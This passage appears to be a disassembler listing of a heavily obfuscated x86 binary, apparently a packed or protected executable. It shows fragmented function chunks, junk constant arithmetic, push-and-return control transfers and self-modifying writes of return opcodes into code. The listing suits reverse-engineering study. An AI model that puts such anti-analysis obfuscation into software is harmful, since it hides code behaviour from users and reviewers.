sub_447BD1	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		test	al, al
		jz	loc_4549C2
		jmp	loc_44DC30
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A6D7

loc_447BFF:				; CODE XREF: sub_44A6D7:loc_448F58j
		jz	loc_4411CA
		jmp	loc_452560
; END OF FUNCTION CHUNK	FOR sub_44A6D7
; ---------------------------------------------------------------------------
		mov	[eax], edx
		jnz	loc_43F380
		jmp	sub_455AA0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458746

loc_447C17:				; CODE XREF: sub_458746:loc_43FD91j
		xor	edx, 5F243173h
		jnz	loc_43ABCA
; END OF FUNCTION CHUNK	FOR sub_458746
; START	OF FUNCTION CHUNK FOR sub_44BFF5

loc_447C23:				; CODE XREF: sub_44BFF5+A6F2j
		jmp	loc_44768E
; END OF FUNCTION CHUNK	FOR sub_44BFF5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FD2B

loc_447C28:				; CODE XREF: sub_43FD2B+480Bj
		jmp	loc_44A727
; END OF FUNCTION CHUNK	FOR sub_43FD2B
; ---------------------------------------------------------------------------
		push	4FFEFD21h
		sub	edx, 143BFDBAh
		sub	ebp, ebx
		sub	edi, 363DFECFh
		jmp	loc_451A5F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D531

loc_447C45:				; CODE XREF: sub_43D531+2DFDj
		xor	ecx, 0A18B17FBh
		add	ecx, 0E5CCE7B5h
		mov	[ecx], eax
		pop	ecx
		lea	eax, nullsub_308
		push	offset sub_458FDF
		jmp	nullsub_309
; END OF FUNCTION CHUNK	FOR sub_43D531
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456F9F

loc_447C64:				; CODE XREF: sub_456F9F:loc_458775j
		push	edx
		call	sub_450F97
		mov	eax, 2DC123E0h
		push	esi
		push	0AE667F04h
		jmp	loc_4443ED
; END OF FUNCTION CHUNK	FOR sub_456F9F
; ---------------------------------------------------------------------------

loc_447C7A:				; CODE XREF: hvvrg7ie:0045682Cj
		mov	byte ptr [eax],	0C3h
		jmp	loc_448846
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44616F

loc_447C82:				; CODE XREF: sub_44616F:loc_459884j
		mov	eax, [esp+0Ch+var_C]
		push	ebp
		mov	ebp, edx
		xchg	ebp, [esp+10h+var_10]
		jmp	loc_4561BC
; END OF FUNCTION CHUNK	FOR sub_44616F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445CCD

loc_447C90:				; CODE XREF: sub_445CCD+BE0Aj
		mov	eax, [eax]
		push	ecx
		mov	ecx, ebp
		xchg	ecx, [esp+0]
		mov	ebp, eax
		xchg	ebp, [esp+0]
		call	sub_43FA98
		test	eax, eax
		jmp	loc_43A6B3
; END OF FUNCTION CHUNK	FOR sub_445CCD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BFF5

loc_447CA9:				; CODE XREF: sub_44BFF5:loc_444EE2j
		adc	edi, eax
		jmp	loc_446C5D
; END OF FUNCTION CHUNK	FOR sub_44BFF5
; ---------------------------------------------------------------------------

loc_447CB0:				; CODE XREF: hvvrg7ie:00455798j
		mov	ebp, ebx
		or	esi, 15AEBA64h

loc_447CB8:				; CODE XREF: hvvrg7ie:loc_455787j
		rol	edx, 0Dh
		add	edx, 0C21C27h
		xor	edx, 558CD5A9h
		add	edx, ebp
		jmp	loc_4516FE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_121. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44191F

loc_447CCF:				; CODE XREF: sub_44191F-6A8Bj
		push	offset sub_453BBD
		jmp	loc_4577A8
; END OF FUNCTION CHUNK	FOR sub_44191F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E163

loc_447CD9:				; CODE XREF: sub_43E163+1ABBEj
		jg	loc_448215
		add	eax, edx

loc_447CE1:				; CODE XREF: hvvrg7ie:loc_45A6F7j
		mov	eax, [ebp-8]
		call	sub_44A994
; END OF FUNCTION CHUNK	FOR sub_43E163
; START	OF FUNCTION CHUNK FOR sub_43A0EC

loc_447CE9:				; CODE XREF: sub_43B3BE+9847j
					; sub_43C8E0:loc_4457A6j ...
		mov	esp, ebp
		pop	ebp
		jmp	nullsub_70
; END OF FUNCTION CHUNK	FOR sub_43A0EC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E8C

loc_447CF1:				; CODE XREF: sub_446E8C+16j
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jz	loc_444BA3
		jmp	loc_450AAE
; END OF FUNCTION CHUNK	FOR sub_446E8C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EB47

loc_447D03:				; CODE XREF: sub_43EB47-562Aj
					; sub_43F13A+4j ...
		jmp	loc_442661
; END OF FUNCTION CHUNK	FOR sub_43EB47
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44271E

loc_447D08:				; CODE XREF: sub_44271E+6j
					; hvvrg7ie:00453A35j
		pop	ecx
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_44271E
; ---------------------------------------------------------------------------
		xor	ebp, 586B6F52h
		jmp	sub_443CB8
; ---------------------------------------------------------------------------

loc_447D16:				; CODE XREF: hvvrg7ie:00446A6Bj
		popf
		pushf
		shl	esi, 0Fh
; START	OF FUNCTION CHUNK FOR sub_43C0DE

loc_447D1B:				; CODE XREF: sub_43C0DE:loc_446A5Aj
		add	edi, 0CE3C6120h
		jmp	loc_4598D9
; END OF FUNCTION CHUNK	FOR sub_43C0DE
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_95. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_447D27:				; CODE XREF: hvvrg7ie:0043B0A6j
					; sub_43F227+174CBj
		jmp	loc_45B1A7
; END OF FUNCTION CHUNK	FOR sub_43F227
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_447D2C:				; CODE XREF: sub_43D285+7238j
		jmp	loc_45451F
; END OF FUNCTION CHUNK	FOR sub_43D285
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445E62

loc_447D31:				; CODE XREF: sub_445E62+Cj
		jz	loc_4503D5
		jmp	loc_44D378
; END OF FUNCTION CHUNK	FOR sub_445E62
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_294. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44958B

loc_447D3D:				; CODE XREF: sub_44958B+Bj
		mov	edi, eax
		pop	eax
		xor	edi, 95D3199Ch
		sub	edi, 16ED44ACh
		jmp	loc_43B51A
; END OF FUNCTION CHUNK	FOR sub_44958B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F227

loc_447D51:				; CODE XREF: sub_43F227-1211j
		rol	eax, 0Fh
		push	eax
		retn
; END OF FUNCTION CHUNK	FOR sub_43F227

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_447D56	proc near		; CODE XREF: sub_4465A6+153E0p

; FUNCTION CHUNK AT 00439434 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043C041 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043DF07 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044632E SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044CDF5 SIZE 0000000D BYTES

		push	ebp
		mov	ebp, esp
		jmp	loc_439434
sub_447D56	endp

; ---------------------------------------------------------------------------

loc_447D5E:				; CODE XREF: hvvrg7ie:00446219j
		jge	loc_452FE9
; START	OF FUNCTION CHUNK FOR sub_45A889

loc_447D64:				; CODE XREF: sub_45A889+10j
		jmp	loc_4423AE
; END OF FUNCTION CHUNK	FOR sub_45A889
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4572D1

loc_447D69:				; CODE XREF: sub_4572D1+Cj
		jmp	loc_444996
; END OF FUNCTION CHUNK	FOR sub_4572D1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411F6

loc_447D6E:				; CODE XREF: sub_4411F6+9j
		jmp	loc_44255D
; END OF FUNCTION CHUNK	FOR sub_4411F6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D2F8

loc_447D73:				; CODE XREF: sub_44D2F8-12D5Cj
		jmp	loc_444A5A
; END OF FUNCTION CHUNK	FOR sub_44D2F8
; ---------------------------------------------------------------------------
		or	edi, edx
		test	ecx, 0AC4A9A07h
		jmp	loc_45A6B2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445E8E

loc_447D85:				; CODE XREF: sub_445E8E-5AEAj
		popf
		xchg	eax, [esp+0]
		jmp	loc_4585E9
; END OF FUNCTION CHUNK	FOR sub_445E8E
; ---------------------------------------------------------------------------
		mov	ds:off_41D16C, eax
		call	sub_45771A

loc_447D99:				; CODE XREF: hvvrg7ie:0044043Dj
		jmp	nullsub_484
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43A142

loc_447D9E:				; CODE XREF: sub_43A142+15j
		jmp	sub_456423
; END OF FUNCTION CHUNK	FOR sub_43A142

; =============== S U B	R O U T	I N E =======================================



sub_447DA3	proc near		; CODE XREF: sub_43C3CB+7p
		xchg	ecx, [esp+0]
		pop	ecx
		push	0E3D24765h
		call	sub_45AAE1
sub_447DA3	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_445B46

loc_447DB1:				; CODE XREF: sub_445B46+284Aj
		jmp	loc_4460F8
; END OF FUNCTION CHUNK	FOR sub_445B46
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442301

loc_447DB6:				; CODE XREF: sub_442301-912Fj
		jmp	sub_446A16
; END OF FUNCTION CHUNK	FOR sub_442301
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_270. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442334

loc_447DBC:				; CODE XREF: sub_442334+108C7j
		jmp	loc_457EA3
; END OF FUNCTION CHUNK	FOR sub_442334
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E1C9

loc_447DC1:				; CODE XREF: sub_44E1C9+9j
		jmp	loc_43CBD4
; END OF FUNCTION CHUNK	FOR sub_44E1C9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43DE01

loc_447DC6:				; CODE XREF: sub_43DE01:loc_4592DDj
		lea	eax, sub_43A0C9
		mov	byte ptr [eax],	0C3h
		jmp	loc_4451AC
; END OF FUNCTION CHUNK	FOR sub_43DE01

; =============== S U B	R O U T	I N E =======================================



sub_447DD4	proc near		; CODE XREF: sub_414884+5Ep
					; sub_41AFA7+6B5p ...
		call	sub_447DE4
		jmp	ds:off_41D07C
sub_447DD4	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453422

loc_447DDF:				; CODE XREF: sub_453422-17918j
		jmp	loc_44FEFD
; END OF FUNCTION CHUNK	FOR sub_453422

; =============== S U B	R O U T	I N E =======================================



sub_447DE4	proc near		; CODE XREF: hvvrg7ie:loc_440E71j
					; sub_447DD4p ...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 004428BB SIZE 0000000D BYTES
; FUNCTION CHUNK AT 004447C9 SIZE 00000005 BYTES

		pop	edx
		js	loc_4428BB
		mov	eax, [esp-4+arg_0]
		jmp	loc_4447C9
sub_447DE4	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_447DF3:				; CODE XREF: hvvrg7ie:004441A3j
		jns	sub_445616

; =============== S U B	R O U T	I N E =======================================



sub_447DF9	proc near		; CODE XREF: sub_446B4C+1469Fp

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00447022 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044D748 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0045523A SIZE 0000000F BYTES
; FUNCTION CHUNK AT 004591F4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459FD5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045AEFA SIZE 00000005 BYTES

		xchg	eax, [esp+4+var_4]
		pop	eax
		mov	esp, ebp
		pop	ebp
		mov	eax, ds:dword_43CD84
		jmp	loc_44D748
sub_447DF9	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_91. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D3E8

loc_447E0C:				; CODE XREF: sub_44D3E8+BBF2j
		jmp	nullsub_353
; END OF FUNCTION CHUNK	FOR sub_44D3E8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4545DB

loc_447E11:				; CODE XREF: sub_4545DB+3j
		jmp	sub_446A16
; END OF FUNCTION CHUNK	FOR sub_4545DB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452F3F

loc_447E16:				; CODE XREF: sub_452F3F+16j
		jmp	loc_456454
; END OF FUNCTION CHUNK	FOR sub_452F3F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CE90

loc_447E1B:				; CODE XREF: sub_44CE90+6j
		jmp	loc_44A80B
; END OF FUNCTION CHUNK	FOR sub_44CE90

; =============== S U B	R O U T	I N E =======================================



sub_447E20	proc near		; CODE XREF: sub_44A994+Dp

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043C753 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 004454AB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044B5A3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045476A SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00457598 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458950 SIZE 00000004 BYTES
; FUNCTION CHUNK AT 00459E49 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0045A84F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045AD07 SIZE 00000007 BYTES

		push	edx
		push	ebp
		pop	edx
		xchg	edx, [esp+4+var_4]
		mov	ebp, esp
		jmp	loc_457598
sub_447E20	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		xchg	edi, esi
		jmp	sub_43EC75
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_67. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457F6F

loc_447E35:				; CODE XREF: sub_457F6F+1EC8j
		jmp	loc_43B1DF
; END OF FUNCTION CHUNK	FOR sub_457F6F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456F18

loc_447E3A:				; CODE XREF: sub_441E23:loc_442741j
					; sub_456F18+9j
		call	sub_443D85
		mov	eax, [esp+0]
		call	sub_43E7F3
		retn
; END OF FUNCTION CHUNK	FOR sub_456F18
; ---------------------------------------------------------------------------
dword_447E48	dd 99D66D60h		; DATA XREF: hvvrg7ie:0043CC99w
					; sub_4495B9:loc_453027r
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4408AE

loc_447E4C:				; CODE XREF: sub_4408AE+172F4j
		jmp	loc_44AF94
; END OF FUNCTION CHUNK	FOR sub_4408AE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439717

loc_447E51:				; CODE XREF: sub_439717+Ej
		jmp	loc_43CA9A
; END OF FUNCTION CHUNK	FOR sub_439717

; =============== S U B	R O U T	I N E =======================================



sub_447E56	proc near		; CODE XREF: sub_40456B+40p
					; sub_40FBF7+222p ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 00439B58 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0043BA41 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0043C249 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00442AB3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00444B70 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 00447037 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00447347 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044807F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449656 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0044A4CF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044AB0C SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044E345 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FAB4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452188 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00453FFB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00454604 SIZE 00000019 BYTES

		push	ecx
		jmp	loc_439B58
sub_447E56	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453422

loc_447E5C:				; CODE XREF: sub_453422-E170j
		add	edx, 1A1308CAh
		test	edx, 2000h
		jmp	loc_440250
; END OF FUNCTION CHUNK	FOR sub_453422
; ---------------------------------------------------------------------------

loc_447E6D:				; CODE XREF: hvvrg7ie:00448E50j
		ror	edx, 5
; START	OF FUNCTION CHUNK FOR sub_4447AC

loc_447E70:				; CODE XREF: sub_4447AC:loc_448E2Dj
		add	edi, 0FF24E52Ch
		call	sub_44A1D5

loc_447E7B:				; CODE XREF: sub_444AA3+AEBDj
		jmp	loc_43A3FF
; END OF FUNCTION CHUNK	FOR sub_4447AC
; ---------------------------------------------------------------------------

locret_447E80:				; CODE XREF: hvvrg7ie:loc_43AA06j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456EAC

loc_447E81:				; CODE XREF: sub_456EAC+Cj
		jmp	nullsub_256
; END OF FUNCTION CHUNK	FOR sub_456EAC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A15C

loc_447E86:				; CODE XREF: sub_44A15C+9j
		jmp	sub_44801A
; END OF FUNCTION CHUNK	FOR sub_44A15C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441E23

loc_447E8B:				; CODE XREF: sub_441E23+1A4Cj
		jmp	loc_43AF83
; END OF FUNCTION CHUNK	FOR sub_441E23
; ---------------------------------------------------------------------------

loc_447E90:				; CODE XREF: hvvrg7ie:loc_44C562j
		mov	byte ptr [eax],	0C3h
		jmp	loc_4473A5

; =============== S U B	R O U T	I N E =======================================



sub_447E98	proc near		; CODE XREF: sub_418D42+31Ep
					; hvvrg7ie:0045079Fj
					; DATA XREF: ...
		push	offset loc_45079A
		jmp	nullsub_67
sub_447E98	endp

; ---------------------------------------------------------------------------

loc_447EA2:				; CODE XREF: hvvrg7ie:0044704Cj
		rol	edi, 11h
		add	edi, 723DA979h
		mov	[edi], eax
		pop	edi
		lea	eax, loc_444B70
		mov	byte ptr [eax],	0C3h
		jmp	loc_444B70

; =============== S U B	R O U T	I N E =======================================



sub_447EBC	proc near		; CODE XREF: sub_419430+4Ap
					; sub_447EBC+5j
					; DATA XREF: ...
		call	sub_43B594
		jmp	ds:off_41D208
sub_447EBC	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B6DB

loc_447EC7:				; CODE XREF: sub_45B6DB+11j
		jmp	loc_45B900
; END OF FUNCTION CHUNK	FOR sub_45B6DB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443048

loc_447ECC:				; CODE XREF: sub_443048+2384j
					; hvvrg7ie:0045AD18j
		or	ecx, 9EF03FB6h
		xor	ecx, 0DB4F22D4h
		test	ecx, 10000000h
		jmp	loc_450E56
; END OF FUNCTION CHUNK	FOR sub_443048
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44398A

loc_447EE3:				; CODE XREF: sub_44398A+172C4j
		jz	loc_448B89
		jmp	loc_451BDF
; END OF FUNCTION CHUNK	FOR sub_44398A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A91B

loc_447EEE:				; CODE XREF: sub_45A91B:loc_439158j
		pop	eax
		sub	eax, 0DBDE74DFh
		or	eax, 979015BCh
		cmp	eax, 5FA64006h
		jmp	loc_444EFF
; END OF FUNCTION CHUNK	FOR sub_45A91B
; ---------------------------------------------------------------------------
		rol	eax, 17h
		push	esi
		push	0C36888DEh
		pop	esi
		rol	esi, 2
		and	esi, 7A8A85AAh

loc_447F19:				; CODE XREF: hvvrg7ie:loc_43B84Bj
		jmp	loc_446EF5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B6A5

loc_447F1E:				; CODE XREF: sub_43B6A5:loc_450D72j
		sub	ebx, ds:4000F7h
		cmp	ebx, 9C3370FCh
		jmp	loc_450214
; END OF FUNCTION CHUNK	FOR sub_43B6A5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4403B6

loc_447F2F:				; CODE XREF: sub_4403B6:loc_454DF6j
		push	0F0D7A773h
		pop	edi
		sub	edi, 0E433B4DDh
		xor	edi, 0E59C3AF7h
		call	sub_446956

loc_447F46:				; CODE XREF: sub_43D285+FEB4j
		and	esi, 0DE07E0DCh
		jmp	loc_44BCDC
; END OF FUNCTION CHUNK	FOR sub_4403B6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456A52

loc_447F51:				; CODE XREF: sub_456A52-4739j
		or	edx, 436539ABh
		rol	edx, 1Bh
		xor	edx, 682C87B4h
		js	loc_4491DC

loc_447F66:				; CODE XREF: sub_43E82E+12j
		jmp	loc_445B57
; END OF FUNCTION CHUNK	FOR sub_456A52
; ---------------------------------------------------------------------------
		cdq
		xor	ecx, edx
		jmp	loc_444440
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456A52

loc_447F73:				; CODE XREF: sub_456A52-113j
		rol	eax, 14h
		jmp	loc_4493CA
; END OF FUNCTION CHUNK	FOR sub_456A52
; ---------------------------------------------------------------------------
		or	esi, 0B4D72CCFh
		shr	edi, 3
		jmp	sub_455B50
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448DE4

loc_447F89:				; CODE XREF: sub_448DE4+4226j
		xor	esi, 0D7E97224h
		add	esi, ebp
		add	esi, 0D9128DD4h
		push	offset sub_43BFE7
		jmp	nullsub_99
; END OF FUNCTION CHUNK	FOR sub_448DE4
; ---------------------------------------------------------------------------
		call	sub_43A87E

loc_447FA6:				; CODE XREF: hvvrg7ie:00448515j
		call	sub_447ACD
; START	OF FUNCTION CHUNK FOR sub_45B70B

loc_447FAB:				; CODE XREF: sub_45B70B-F241j
		jmp	loc_441B4E
; END OF FUNCTION CHUNK	FOR sub_45B70B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458706

loc_447FB0:				; CODE XREF: sub_458706-ED2j
		push	eax
		mov	eax, ecx
		xchg	eax, [esp+8+var_8]
		mov	esp, ebp
		pop	ebp
		push	0E6B1017h
		jmp	loc_445ED1
; END OF FUNCTION CHUNK	FOR sub_458706
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F97

loc_447FC3:				; CODE XREF: sub_450F97-F92Bj
		call	sub_43CEB6

loc_447FC8:				; CODE XREF: sub_450F97-3F70j
		mov	edi, 0F246DEFFh
		adc	ecx, 22F884D7h
		or	eax, edx
		jb	loc_447AB0
		jmp	loc_43D772
; END OF FUNCTION CHUNK	FOR sub_450F97
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4462F9

loc_447FE0:				; CODE XREF: sub_4462F9-98D8j
		jz	loc_44520A
		jmp	loc_446761
; END OF FUNCTION CHUNK	FOR sub_4462F9

; =============== S U B	R O U T	I N E =======================================



sub_447FEB	proc near		; CODE XREF: sub_446956:loc_44695Cp
					; hvvrg7ie:004476B9j

; FUNCTION CHUNK AT 0043CD55 SIZE 0000000B BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		pop	edi
		ror	eax, 4
		add	eax, 0B37E04F2h
		jmp	loc_43CD55
sub_447FEB	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		sbb	ebp, 44E95079h
		jmp	sub_4478FE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456A52

loc_448009:				; CODE XREF: sub_456A52-10669j
		mov	ecx, esi
		pop	esi
		xchg	edx, [esp-8+arg_0]
		mov	ebp, edx
		pop	edx
		retn	0Ch
; END OF FUNCTION CHUNK	FOR sub_456A52
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BFB4

loc_448015:				; CODE XREF: sub_43BFB4+16j
		jmp	loc_43CD23
; END OF FUNCTION CHUNK	FOR sub_43BFB4

; =============== S U B	R O U T	I N E =======================================



sub_44801A	proc near		; CODE XREF: sub_444CF3:loc_447136j
					; sub_44A15C:loc_447E86j ...

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043A0D3 SIZE 00000004 BYTES

		push	eax
		push	ebp
		jmp	loc_43A0D3
sub_44801A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455087

loc_448021:				; CODE XREF: sub_455087:loc_45592Dj
		jnz	loc_43B68F
		jmp	loc_457FD7
; END OF FUNCTION CHUNK	FOR sub_455087
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E3B3

loc_44802C:				; CODE XREF: sub_44E3B3:loc_45B90Fj
		jz	loc_459A4A
		jmp	loc_449AC7
; END OF FUNCTION CHUNK	FOR sub_44E3B3
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_334. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B3BE

loc_448038:				; CODE XREF: sub_43B3BE+16E5Fj
		jmp	loc_43F83E
; END OF FUNCTION CHUNK	FOR sub_43B3BE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4468C2

loc_44803D:				; CODE XREF: sub_4468C2+D8C8j
		cmp	ebp, edi
		jmp	loc_44E7CE
; END OF FUNCTION CHUNK	FOR sub_4468C2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444BE1

loc_448044:				; CODE XREF: sub_444BE1:loc_43ED79j
		adc	esi, ebx
		jmp	loc_44E09E
; END OF FUNCTION CHUNK	FOR sub_444BE1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_455. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BFF5

loc_44804C:				; CODE XREF: sub_44BFF5:loc_455416j
		jnz	loc_45758E
		jmp	loc_44A5B5
; END OF FUNCTION CHUNK	FOR sub_44BFF5

; =============== S U B	R O U T	I N E =======================================



sub_448057	proc near		; CODE XREF: sub_449DC2+8p
					; hvvrg7ie:00452E4Fj

; FUNCTION CHUNK AT 00443060 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00444B00 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D7D4 SIZE 00000005 BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		jz	loc_443060
		mov	dword ptr [ebp-8], 1
		jmp	loc_44D7D4
sub_448057	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447079

loc_44806D:				; CODE XREF: sub_447079j
		call	sub_451C8E

loc_448072:				; CODE XREF: sub_44191F-44EBj
		jmp	nullsub_69
; END OF FUNCTION CHUNK	FOR sub_447079

; =============== S U B	R O U T	I N E =======================================



sub_448077	proc near		; DATA XREF: hvvrg7ie:00456964o
		mov	edx, [ebp-4]
		call	sub_45567C
sub_448077	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_447E56

loc_44807F:				; CODE XREF: sub_447E56+A34Bj
		jmp	loc_44AB0C
; END OF FUNCTION CHUNK	FOR sub_447E56
; ---------------------------------------------------------------------------

loc_448084:				; CODE XREF: hvvrg7ie:0044DDE2j
		adc	ebx, 0B836F6B5h

; =============== S U B	R O U T	I N E =======================================



sub_44808A	proc near		; CODE XREF: sub_44E560-97F5p

; FUNCTION CHUNK AT 00445123 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00447066 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00450B59 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00456B66 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004592F7 SIZE 0000000D BYTES

		xchg	edx, [esp+0]
		pop	edx
		add	edx, ebp
		add	edx, 0DA1310E8h
		mov	edx, [edx]
		imul	byte ptr [edx]
		jmp	loc_4592F7
sub_44808A	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_44809F	proc near		; DATA XREF: sub_441D9D+3o

; FUNCTION CHUNK AT 00441E55 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00444750 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004448F0 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0044E2DD SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00456C83 SIZE 0000000D BYTES

		add	esp, 0FFFFFFF8h
		mov	[ebp-4], eax
		mov	eax, [ebp-4]
